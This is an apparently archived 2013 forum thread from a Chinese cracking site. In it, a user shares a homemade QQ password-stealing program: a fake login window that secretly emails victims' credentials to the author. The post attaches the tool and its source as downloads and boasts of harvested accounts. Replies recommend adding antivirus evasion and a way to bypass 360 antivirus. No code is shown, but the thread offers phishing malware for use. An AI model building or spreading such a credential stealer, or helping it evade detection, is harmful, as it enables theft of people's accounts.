吾爱破解 - LCG - LSG |安卓破解|病毒分析|www.52pojie.cn

注册[Register]

QQ登录

只需一步,快速开始

[易语言 转载] 易语言学习中.....自制盗号软件,大牛请指教,供菜鸟学习,甚是简单。。

qq502411068 发表于 2013-8-2 22:42

偶是菜鸟,请大牛不要笑话,请大牛指点,偶是菜鸟,请大牛,大神,大哥哥提出建议,我承认这确实很垃圾,但是自己做出来,偶的自信心一下子就得到了满足,还是供菜鸟们学习,源码是我在网上搜的发邮件的源码,经过我的改装,已经像是一个盗号的软件了,其实也不是什么盗号软件,就是一个伪装的发邮件的后台,但是很强大的,我最高的一次一天有很多很多个号发我邮箱来,这不是炫耀 哦。。          菜鸟们(包括我)切记, 思路很重要!
                           下面是制作时的截图   对了   免杀和加壳     在之后再上传哦。
                            源码已打包

测试下。

测试下。

输入方式

输入方式

输入方式

输入方式

正在思考怎么设计

正在思考怎么设计
DWFCZ[A]A]5[WSIF_%4O_{Q.jpg VWC}0BF6K[Wd[KTY036JO.jpg

自制daohao软件.rar

487.28 KB, 下载次数: 403, 下载积分: 吾爱币 -1 CB

制作完成后的

源码11.rar

2.36 KB, 下载次数: 261, 下载积分: 吾爱币 -1 CB

源码

表示几年前就做过这玩意。。  发表于 2013-10-1 10:53
有验证机制么?  发表于 2013-8-3 10:26

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

楼主| qq502411068 发表于 2014-3-22 22:46
993龙老 发表于 2014-1-19 19:44
就是,8楼说得好,先添加一个绕360或者检测360是否存在的。百度就有。然后用连接发信服务器如果真来验证QQ ...

很好的思路,建议已收到》》》。。
Demo 发表于 2013-8-2 22:45
尊雅 发表于 2013-8-2 22:46
tisx89 发表于 2013-8-2 22:46
支持原创作品!!!
花葬 发表于 2013-8-2 22:47
这……真粗糙。。。。。不过骗骗小孩子还是不错滴
psx_810 发表于 2013-8-2 22:48
笑而不语.
Perry 发表于 2013-8-2 22:48
这个界面。。。。。。 值得学习
ansley 发表于 2013-8-2 22:48
这个有没有免杀,上次一个朋友给我搞一个,我还真被骗了,就输入了密码,一点确定,我家的MSE杀毒就拦截了,还说出了收信的邮箱!最好搞一下免杀,要不就没用~~
尊雅 发表于 2013-8-2 22:49
几百年前的东西    小白才上当的   咳 咳 随便会点的人   你就能.....    你懂的   洗洗睡吧   
噜冰花 发表于 2013-8-2 22:49
你这附件······孩纸360准拦截·····